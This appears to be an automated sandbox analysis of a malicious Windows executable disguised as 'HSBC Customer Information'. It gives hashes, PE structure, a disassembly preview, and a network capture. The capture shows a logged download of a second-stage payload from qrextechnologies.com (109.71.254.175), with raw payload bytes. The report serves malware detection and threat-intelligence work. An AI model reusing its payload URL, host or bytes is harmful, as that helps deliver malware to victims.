              Match: 37f463bf4616ecd445d4a1937da06e19 (JA3 fingerprint shared by all rows below)
              Associated Sample Name / URL | Detection | Context
              4478884ce2cf578bf0a0d2484fc8221e5ff63d7cbc73d5200bacbd6e2796e017.exe | malicious | 109.71.254.175
              aZq3gco8Ab.exe | malicious | 109.71.254.175
              Medical-Engagement-Scale-Questionnaire.msi | malicious | 109.71.254.175
              setup_x86_x64_install.exe | malicious | 109.71.254.175
              CI and PL of CMZBD-210090.exe | malicious | 109.71.254.175
              Aplieco_6635.exe | malicious | 109.71.254.175
              egQIhpn3UW.exe | malicious | 109.71.254.175
              4J1sKiGm0T.exe | malicious | 109.71.254.175
              91a9d1482cacbe1adc5b23f56604b376860c13b69894164a9f79f9292d7f79b1.xls | malicious | 109.71.254.175
              #Ud83c#Udfb5mlavarnway_1250PM_ _3pm.html | malicious | 109.71.254.175
              lB2RFTpyni.exe | malicious | 109.71.254.175
              lgT2LzjZ6N.exe | malicious | 109.71.254.175
              ULTkbegFv8.exe | malicious | 109.71.254.175
              gmeqUPOV23.exe | malicious | 109.71.254.175
              tRMzIpPm2C.exe | malicious | 109.71.254.175
              H1zkKCLztq.exe | malicious | 109.71.254.175
              BqgOuMRaJ3.exe | malicious | 109.71.254.175
              image.exe | malicious | 109.71.254.175
              Pm2ZO9KH1V.exe | malicious | 109.71.254.175
              m1Bf7Ir6IB.exe | malicious | 109.71.254.175

              Dropped Files

              No context

              Created / dropped Files

              No created / dropped files found

              Static File Info

              General

              File type: PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit): 6.225522855611587
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.15%
              • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name: HSBC Customer Information.exe
              File size: 122880
              MD5: 448f83467c61e465162daf7cf8d9e88f
              SHA1: c627061336905606c2c26b2b460ac4246fd54ca5
              SHA256: 4773c7c5c52d0163bfa32cb271399692831e00ff7e6877f0877091e111c9f063
              SHA512: 1f72e8cc6ec0c5d8f82a47ccd0e8dfa91bb9e7e90a00b34a6a466c8823579e58330f4c709ecb6c580814c3875bf618c1cbb7a5c83f70e8be08dbe46ca1a41fe3
              SSDEEP: 1536:5EBupM4lApP843c9C72xMDqXq39T8g9AhfIRorEjc145:g4+p04s9iGMDfl0PrEw145
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L....=<O.....................@....................@................

              File Icon

              Icon Hash: 20047c7c70f0e004

              Static PE Info

              General

              Entrypoint: 0x4017ac
              Entrypoint Section: .text
              Digitally signed: false
              Imagebase: 0x400000
              Subsystem: windows gui
              Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              DLL Characteristics:
              Time Stamp: 0x4F3C3DB1 [Wed Feb 15 23:20:17 2012 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major: 4
              OS Version Minor: 0
              File Version Major: 4
              File Version Minor: 0
              Subsystem Version Major: 4
              Subsystem Version Minor: 0
              Import Hash: 4d0b2c4c35fea49148bb1439759df35a

              Entrypoint Preview

              Instruction
              push 0040C454h
              call 00007FC36CB59335h
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              xor byte ptr [eax], al
              add byte ptr [eax], al
              inc eax
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], ch
              pop eax
              stc
              out dx, al
              adc edx, dword ptr [ebx-56h]
              dec eax
              cdq
              xor ah, byte ptr [edi]
              js 00007FC36CB593C0h
              push ds
              inc ecx
              mov ch, 00h
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [ecx], al
              add byte ptr [eax], al
              add byte ptr [ebx], al
              add eax, dword ptr [ecx]
              add byte ptr [eax], al
              add byte ptr [eax+6Ch], dl
              jne 00007FC36CB593B5h
              imul esi, dword ptr [ecx+ebp*2+63h], 736E6F63h
              jne 00007FC36CB59342h
              add byte ptr [eax], al
              add byte ptr [eax], al
              add bh, bh
              int3
              xor dword ptr [eax], eax
              or al, 32h
              dec esp
              push es
              sub edi, dword ptr [ebp-6BB60022h]
              fadd qword ptr [edi-52h]
              sbb al, 69h
              mov ebp, 85D79967h
              pop es
              xor ah, byte ptr [edx-74CF43BCh]
              cmpsb
              bound esp, dword ptr [edi+4F3A8358h]
              lodsd
              xor ebx, dword ptr [ecx-48EE309Ah]
              or al, 00h
              stosb
              add byte ptr [eax-2Dh], ah
              xchg eax, ebx
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              cmp al, ABh
              add byte ptr [eax], al
              dec esi
              add byte ptr [eax], al
              add byte ptr [eax], al
              or al, byte ptr [eax]
              dec esp
              dec ecx
              push esi
              push ebx
              push esp
              inc ebp
              inc edi
              dec esi
              inc ebp
              push esp
              add byte ptr [53000B01h], cl
              outsd
              insd
              insd

              Data Directories

              Name | Virtual Address | Virtual Size | Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_IMPORT | 0x19db4 | 0x28 | .text
              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1d000 | 0x16fe | .rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x228 | 0x20 |
              IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x14c | .text
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

              Sections

              Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
              .text | 0x1000 | 0x192f0 | 0x1a000 | False | 0.427715594952 | data | 6.65061784926 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              .data | 0x1b000 | 0x119c | 0x1000 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
              .rsrc | 0x1d000 | 0x16fe | 0x2000 | False | 0.243530273438 | data | 2.90412945661 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

              Resources

              Name | RVA | Size | Type | Language | Country
              CUSTOM | 0x1de40 | 0x8be | MS Windows icon resource - 1 icon, 32x32, 11 bits/pixel | English | United States
              CUSTOM | 0x1db42 | 0x2fe | MS Windows icon resource - 1 icon, 32x32, 16 colors, 4 bits/pixel | English | United States
              CUSTOM | 0x1da04 | 0x13e | MS Windows icon resource - 1 icon, 16x16, 16 colors | English | United States
              RT_ICON | 0x1d8d4 | 0x130 | data | |
              RT_ICON | 0x1d5ec | 0x2e8 | data | |
              RT_ICON | 0x1d4c4 | 0x128 | GLS_BINARY_LSB_FIRST | |
              RT_GROUP_ICON | 0x1d494 | 0x30 | data | |
              RT_VERSION | 0x1d200 | 0x294 | data | Norwegian | Norway

              Imports

              DLL | Import
              MSVBVM60.DLL | _CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaAryMove, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaErase, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, __vbaI2I4, DllFunctionCall, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, __vbaInStr, __vbaVar2Vec, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaInStrB, __vbaVarAdd, __vbaVarDup, __vbaStrToAnsi, _CIatan, __vbaStrMove, __vbaCastObj, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

              Version Infos

              Description | Data
              Translation | 0x0414 0x04b0
              InternalName | Blankningscu5
              FileVersion | 1.00
              CompanyName | Asus
              Comments | Thunderbird
              ProductName | spicevpn.com
              ProductVersion | 1.00
              FileDescription | Hp, Inc.
              OriginalFilename | Blankningscu5.exe

              Possible Origin

              Language of compilation system | Country where language is spoken
              English | United States
              Norwegian | Norway

              Network Behavior

              Network Port Distribution

              TCP Packets

              Timestamp | Source Port | Dest Port | Source IP | Dest IP
              Sep 15, 2021 07:14:39.267390013 CEST | 49791 | 443 | 192.168.2.3 | 109.71.254.175
              Sep 15, 2021 07:14:39.267465115 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.267642975 CEST | 49791 | 443 | 192.168.2.3 | 109.71.254.175
              Sep 15, 2021 07:14:39.299012899 CEST | 49791 | 443 | 192.168.2.3 | 109.71.254.175
              Sep 15, 2021 07:14:39.299042940 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.375438929 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.375636101 CEST | 49791 | 443 | 192.168.2.3 | 109.71.254.175
              Sep 15, 2021 07:14:39.730459929 CEST | 49791 | 443 | 192.168.2.3 | 109.71.254.175
              Sep 15, 2021 07:14:39.730519056 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.731198072 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.731314898 CEST | 49791 | 443 | 192.168.2.3 | 109.71.254.175
              Sep 15, 2021 07:14:39.734287977 CEST | 49791 | 443 | 192.168.2.3 | 109.71.254.175
              Sep 15, 2021 07:14:39.765878916 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.765928984 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.766189098 CEST | 49791 | 443 | 192.168.2.3 | 109.71.254.175
              Sep 15, 2021 07:14:39.766231060 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.766554117 CEST | 49791 | 443 | 192.168.2.3 | 109.71.254.175
              Sep 15, 2021 07:14:39.797091007 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.797210932 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.797358036 CEST | 49791 | 443 | 192.168.2.3 | 109.71.254.175
              Sep 15, 2021 07:14:39.797394037 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.797485113 CEST | 49791 | 443 | 192.168.2.3 | 109.71.254.175
              Sep 15, 2021 07:14:39.797548056 CEST | 49791 | 443 | 192.168.2.3 | 109.71.254.175
              Sep 15, 2021 07:14:39.828288078 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.828392982 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.828459024 CEST | 49791 | 443 | 192.168.2.3 | 109.71.254.175
              Sep 15, 2021 07:14:39.828481913 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.828526974 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.828604937 CEST | 49791 | 443 | 192.168.2.3 | 109.71.254.175
              Sep 15, 2021 07:14:39.828634977 CEST | 49791 | 443 | 192.168.2.3 | 109.71.254.175
              Sep 15, 2021 07:14:39.828648090 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.828905106 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.829020977 CEST | 49791 | 443 | 192.168.2.3 | 109.71.254.175
              Sep 15, 2021 07:14:39.829040051 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.829272032 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.829380035 CEST | 49791 | 443 | 192.168.2.3 | 109.71.254.175
              Sep 15, 2021 07:14:39.829399109 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.829581976 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.829687119 CEST | 49791 | 443 | 192.168.2.3 | 109.71.254.175
              Sep 15, 2021 07:14:39.829704046 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.829871893 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.829977989 CEST | 49791 | 443 | 192.168.2.3 | 109.71.254.175
              Sep 15, 2021 07:14:39.829988956 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.830723047 CEST | 49791 | 443 | 192.168.2.3 | 109.71.254.175
              Sep 15, 2021 07:14:39.862091064 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.862462044 CEST | 49791 | 443 | 192.168.2.3 | 109.71.254.175
              Sep 15, 2021 07:14:39.862756968 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.862868071 CEST | 49791 | 443 | 192.168.2.3 | 109.71.254.175
              Sep 15, 2021 07:14:39.862936020 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.863046885 CEST | 49791 | 443 | 192.168.2.3 | 109.71.254.175
              Sep 15, 2021 07:14:39.863142967 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.863255978 CEST | 49791 | 443 | 192.168.2.3 | 109.71.254.175
              Sep 15, 2021 07:14:39.863372087 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.863491058 CEST | 49791 | 443 | 192.168.2.3 | 109.71.254.175
              Sep 15, 2021 07:14:39.863603115 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.863712072 CEST | 49791 | 443 | 192.168.2.3 | 109.71.254.175
              Sep 15, 2021 07:14:39.863790035 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.863898993 CEST | 49791 | 443 | 192.168.2.3 | 109.71.254.175
              Sep 15, 2021 07:14:39.863975048 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.864073992 CEST | 49791 | 443 | 192.168.2.3 | 109.71.254.175
              Sep 15, 2021 07:14:39.864178896 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.864283085 CEST | 49791 | 443 | 192.168.2.3 | 109.71.254.175
              Sep 15, 2021 07:14:39.864370108 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.864464998 CEST | 49791 | 443 | 192.168.2.3 | 109.71.254.175
              Sep 15, 2021 07:14:39.864562035 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.864675045 CEST | 49791 | 443 | 192.168.2.3 | 109.71.254.175
              Sep 15, 2021 07:14:39.864739895 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.864835024 CEST | 49791 | 443 | 192.168.2.3 | 109.71.254.175
              Sep 15, 2021 07:14:39.895227909 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.895344019 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.895487070 CEST | 49791 | 443 | 192.168.2.3 | 109.71.254.175
              Sep 15, 2021 07:14:39.895529985 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.895560026 CEST | 49791 | 443 | 192.168.2.3 | 109.71.254.175
              Sep 15, 2021 07:14:39.895632029 CEST | 49791 | 443 | 192.168.2.3 | 109.71.254.175
              Sep 15, 2021 07:14:39.895764112 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.895894051 CEST | 49791 | 443 | 192.168.2.3 | 109.71.254.175
              Sep 15, 2021 07:14:39.895960093 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.896049023 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.896142006 CEST | 49791 | 443 | 192.168.2.3 | 109.71.254.175
              Sep 15, 2021 07:14:39.896150112 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.896204948 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.896225929 CEST | 49791 | 443 | 192.168.2.3 | 109.71.254.175
              Sep 15, 2021 07:14:39.896234035 CEST | 49791 | 443 | 192.168.2.3 | 109.71.254.175
              Sep 15, 2021 07:14:39.896284103 CEST | 49791 | 443 | 192.168.2.3 | 109.71.254.175
              Sep 15, 2021 07:14:39.897289038 CEST | 49791 | 443 | 192.168.2.3 | 109.71.254.175
              Sep 15, 2021 07:14:39.899893045 CEST | 443 | 49791 | 109.71.254.175 | 192.168.2.3
              Sep 15, 2021 07:14:39.900063038 CEST | 49791 | 443 | 192.168.2.3 | 109.71.254.175

              UDP Packets

              Timestamp | Source Port | Dest Port | Source IP | Dest IP
              Sep 15, 2021 07:11:00.729901075 CEST | 50620 | 53 | 192.168.2.3 | 8.8.8.8
              Sep 15, 2021 07:11:00.766253948 CEST | 53 | 50620 | 8.8.8.8 | 192.168.2.3
              Sep 15, 2021 07:11:31.351835966 CEST | 64938 | 53 | 192.168.2.3 | 8.8.8.8
              Sep 15, 2021 07:11:31.400479078 CEST | 53 | 64938 | 8.8.8.8 | 192.168.2.3
              Sep 15, 2021 07:11:33.780060053 CEST | 60152 | 53 | 192.168.2.3 | 8.8.8.8
              Sep 15, 2021 07:11:33.825601101 CEST | 53 | 60152 | 8.8.8.8 | 192.168.2.3
              Sep 15, 2021 07:11:51.843823910 CEST | 57544 | 53 | 192.168.2.3 | 8.8.8.8
              Sep 15, 2021 07:11:51.885613918 CEST | 53 | 57544 | 8.8.8.8 | 192.168.2.3
              Sep 15, 2021 07:12:09.509416103 CEST | 55984 | 53 | 192.168.2.3 | 8.8.8.8
              Sep 15, 2021 07:12:09.545875072 CEST | 53 | 55984 | 8.8.8.8 | 192.168.2.3
              Sep 15, 2021 07:12:15.316302061 CEST | 64185 | 53 | 192.168.2.3 | 8.8.8.8
              Sep 15, 2021 07:12:15.352229118 CEST | 53 | 64185 | 8.8.8.8 | 192.168.2.3
              Sep 15, 2021 07:12:46.375292063 CEST | 65110 | 53 | 192.168.2.3 | 8.8.8.8
              Sep 15, 2021 07:12:46.410969019 CEST | 53 | 65110 | 8.8.8.8 | 192.168.2.3
              Sep 15, 2021 07:12:49.240334988 CEST | 58361 | 53 | 192.168.2.3 | 8.8.8.8
              Sep 15, 2021 07:12:49.284069061 CEST | 53 | 58361 | 8.8.8.8 | 192.168.2.3
              Sep 15, 2021 07:13:54.163676977 CEST | 63492 | 53 | 192.168.2.3 | 8.8.8.8
              Sep 15, 2021 07:13:54.213160992 CEST | 53 | 63492 | 8.8.8.8 | 192.168.2.3
              Sep 15, 2021 07:13:54.827075958 CEST | 60831 | 53 | 192.168.2.3 | 8.8.8.8
              Sep 15, 2021 07:13:54.910854101 CEST | 53 | 60831 | 8.8.8.8 | 192.168.2.3
              Sep 15, 2021 07:13:55.345204115 CEST | 60100 | 53 | 192.168.2.3 | 8.8.8.8
              Sep 15, 2021 07:13:55.373862028 CEST | 53 | 60100 | 8.8.8.8 | 192.168.2.3
              Sep 15, 2021 07:13:55.776545048 CEST | 53195 | 53 | 192.168.2.3 | 8.8.8.8
              Sep 15, 2021 07:13:55.847096920 CEST | 53 | 53195 | 8.8.8.8 | 192.168.2.3
              Sep 15, 2021 07:13:56.344090939 CEST | 50141 | 53 | 192.168.2.3 | 8.8.8.8
              Sep 15, 2021 07:13:56.373194933 CEST | 53 | 50141 | 8.8.8.8 | 192.168.2.3
              Sep 15, 2021 07:13:56.835848093 CEST | 53023 | 53 | 192.168.2.3 | 8.8.8.8
              Sep 15, 2021 07:13:56.872772932 CEST | 53 | 53023 | 8.8.8.8 | 192.168.2.3
              Sep 15, 2021 07:13:57.487806082 CEST | 49563 | 53 | 192.168.2.3 | 8.8.8.8
              Sep 15, 2021 07:13:57.570281029 CEST | 53 | 49563 | 8.8.8.8 | 192.168.2.3
              Sep 15, 2021 07:13:58.351824999 CEST | 51352 | 53 | 192.168.2.3 | 8.8.8.8
              Sep 15, 2021 07:13:58.388124943 CEST | 53 | 51352 | 8.8.8.8 | 192.168.2.3
              Sep 15, 2021 07:13:59.291834116 CEST | 59349 | 53 | 192.168.2.3 | 8.8.8.8
              Sep 15, 2021 07:13:59.319132090 CEST | 53 | 59349 | 8.8.8.8 | 192.168.2.3
              Sep 15, 2021 07:13:59.808149099 CEST | 57084 | 53 | 192.168.2.3 | 8.8.8.8
              Sep 15, 2021 07:13:59.835134983 CEST | 53 | 57084 | 8.8.8.8 | 192.168.2.3
              Sep 15, 2021 07:14:39.176923990 CEST | 58823 | 53 | 192.168.2.3 | 8.8.8.8
              Sep 15, 2021 07:14:39.218681097 CEST | 53 | 58823 | 8.8.8.8 | 192.168.2.3

              DNS Queries

              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
              Sep 15, 2021 07:14:39.176923990 CEST | 192.168.2.3 | 8.8.8.8 | 0x844c | Standard query (0) | qrextechnologies.com | A (IP address) | IN (0x0001)

              DNS Answers

              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
              Sep 15, 2021 07:14:39.218681097 CEST | 8.8.8.8 | 192.168.2.3 | 0x844c | No error (0) | qrextechnologies.com | | 109.71.254.175 | A (IP address) | IN (0x0001)

              HTTP Request Dependency Graph

              • qrextechnologies.com

              HTTPS Proxied Packets

              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              0 | 192.168.2.3 | 49791 | 109.71.254.175 | 443 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              Timestamp | kBytes transferred | Direction | Data
              2021-09-15 05:14:39 UTC | 0 | OUT | GET /barrr09_HVPbNJre68.bin HTTP/1.1
              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
              Host: qrextechnologies.com
              Cache-Control: no-cache
              2021-09-15 05:14:39 UTC | 0 | IN | HTTP/1.1 200 OK
              Date: Wed, 15 Sep 2021 05:14:39 GMT
              Server: Apache
              Last-Modified: Tue, 14 Sep 2021 21:20:41 GMT
              Accept-Ranges: bytes
              Content-Length: 221760
              Connection: close
              Content-Type: application/octet-stream
              2021-09-15 05:14:39 UTC | 0 | IN | Data Raw: 68 68 d3 c4 11 32 cb 78 ab 72 c8 da f5 70 93 1a 83 68 38 89 77 20 41 71 14 c5 bb a0 ca 39 c6 47 64 ee ec 35 d6 cd 9b 3e 7a 18 40 ed 56 f3 cf cb 6a 73 24 02 3e 51 4c e4 0d 1f 99 23 05 0c ce fc 96 15 fc cc 1a 58 fd 3a 04 d8 46 68 cb 8f 21 a5 76 b5 c8 21 03 13 e0 64 a1 e0 d4 7c 5a 54 31 6e d3 60 cc f4 0b 72 a4 65 b5 e8 de 8f c4 73 36 69 0f 82 6e 49 53 36 8b 9d 05 6f d0 4b cf aa 06 d5 ca e1 50 bb ba f6 23 e5 e2 ec 48 92 7b ba 23 06 34 9a 7a 76 1d 36 ca 1d cd 6d c1 16 df 2a d4 fc 6b 67 9a 76 30 c9 c1 5e 16 6a 9b c9 53 4f 1d 4c 5e e7 69 30 e0 ad 46 64 6f a1 cf 08 d2 26 60 d7 75 f9 09 39 03 fd 04 aa a4 92 04 3f 64 b1 1e d0 22 86 b3 4f d7 48 ff d5 6f f7 c4 75 8c f9 b3 32 bd 41 14 fe c6 0a a3 72 86 7f 3d f6 e5 72 b1 44 8b bd da 05 10 01 c7 16 ed 29 97 18 a1 c4 a5
              Data Ascii: hh2xrph8w Aq9Gd5>z@Vjs$>QL#X:Fh!v!d|ZT1n`res6inIS6oKP#H{#4zv6m*kgv0^jSOL^i0Fdo&`u9?d"OHou2Ar=rD)
              2021-09-15 05:14:39 UTC8INData Raw: d7 0f 23 f9 72 99 e4 6e 38 24 68 de dc 8b e7 12 6b 81 96 19 0b 67 0d 05 50 70 ee cd d5 c6 05 1d 71 85 97 cc d2 95 b8 3e a1 f3 48 40 2e 05 dc 14 68 f8 e8 bb 31 50 9a 8d e5 6f c7 9d 9b 18 ec a4 84 82 18 d8 ff 00 7c fe 31 25 91 a1 58 05 f7 61 a2 c6 57 34 45 c5 19 e2 ab 98 3b e1 be 61 9b 3c e3 97 97 1d 33 e2 82 cd 1a ee f4 ce fe c2 6c fd be 69 cb 72 7c e9 18 43 a3 18 7a 9d af a3 64 84 87 44 bf a3 af e0 ce 02 05 b0 b9 ed e2 02 75 31 2d ce 43 14 85 2d 25 ab 79 71 fb 70 8b 66 39 c8 9c 7a f3 ec 2b 08 0a 11 05 f2 eb 0c 79 cf 82 1c 03 ca 91 b2 3c 88 56 1e ec 0c 27 88 8f 08 11 6e eb 7f 7f 5a f3 d4 a4 87 39 05 2f 48 ab a2 19 29 db aa e0 57 00 48 42 ba c9 48 99 90 49 bf 72 2e 79 80 18 17 a6 26 df 47 ba e1 99 44 4c 37 ff b4 59 75 0a d2 fe 8a 29 47 ff 65 00 96 89 a1 b0
              Data Ascii: #rn8$hkgPpq>H@.h1Po|1%XaW4E;a<3lir|CzdDu1-C-%yqpf9z+y<V'nZ9/H)WHBHIr.y&GDL7Yu)Ge
              2021-09-15 05:14:39 UTC15INData Raw: 81 e7 60 1f fe a3 fc 30 52 6a 23 83 ff 0a d3 62 89 ab d5 b5 4a 89 53 7d 05 b9 a7 59 28 47 69 c0 75 29 aa 70 57 d4 06 f9 98 a4 29 5d 92 e7 c6 17 5d 53 ff bd ec fe d9 92 17 db f6 da 23 20 ff 21 7d 27 48 91 47 ef 3c 54 5f e2 bc 9e 96 ab a8 67 76 44 79 0a 0d 2b bd f6 d7 79 7b f8 60 48 b4 41 6a 36 13 c0 f1 2b 20 27 2f 74 14 35 a5 d9 da 5f a5 00 c3 86 04 d0 05 fa 32 f5 31 54 b7 20 5a 9a a1 9e 46 56 d8 ea ce 31 5a 22 cf be 6e d4 26 a4 1f 28 9e b2 7e f5 42 ef 96 d6 72 71 9e 41 d0 ed e9 cd c2 5d 10 da de 21 ce 5b 52 d9 4c 70 b2 c8 7f ab d1 e1 ee 31 e8 d4 66 30 67 2b 8c 01 ec 27 75 b2 7b b4 1d a1 04 1c e6 45 1b ba 5e 07 56 9a 30 1e d7 0f 23 f9 72 99 e4 79 10 35 68 de da 8a dd 12 6b ef b2 c7 07 43 3a 05 50 60 c6 f5 d4 c6 0f c3 71 a9 97 cd c2 e5 ba 3e a1 85 4a 4e 20
              Data Ascii: `0Rj#bJS}Y(Giu)pW)]]S# !}'HG<T_gvDy+y{`HAj6+ '/t5_21T ZFV1Z"n&(~BrqA]![RLp1f0g+'u{E^V0#ry5hkC:P`q>JN
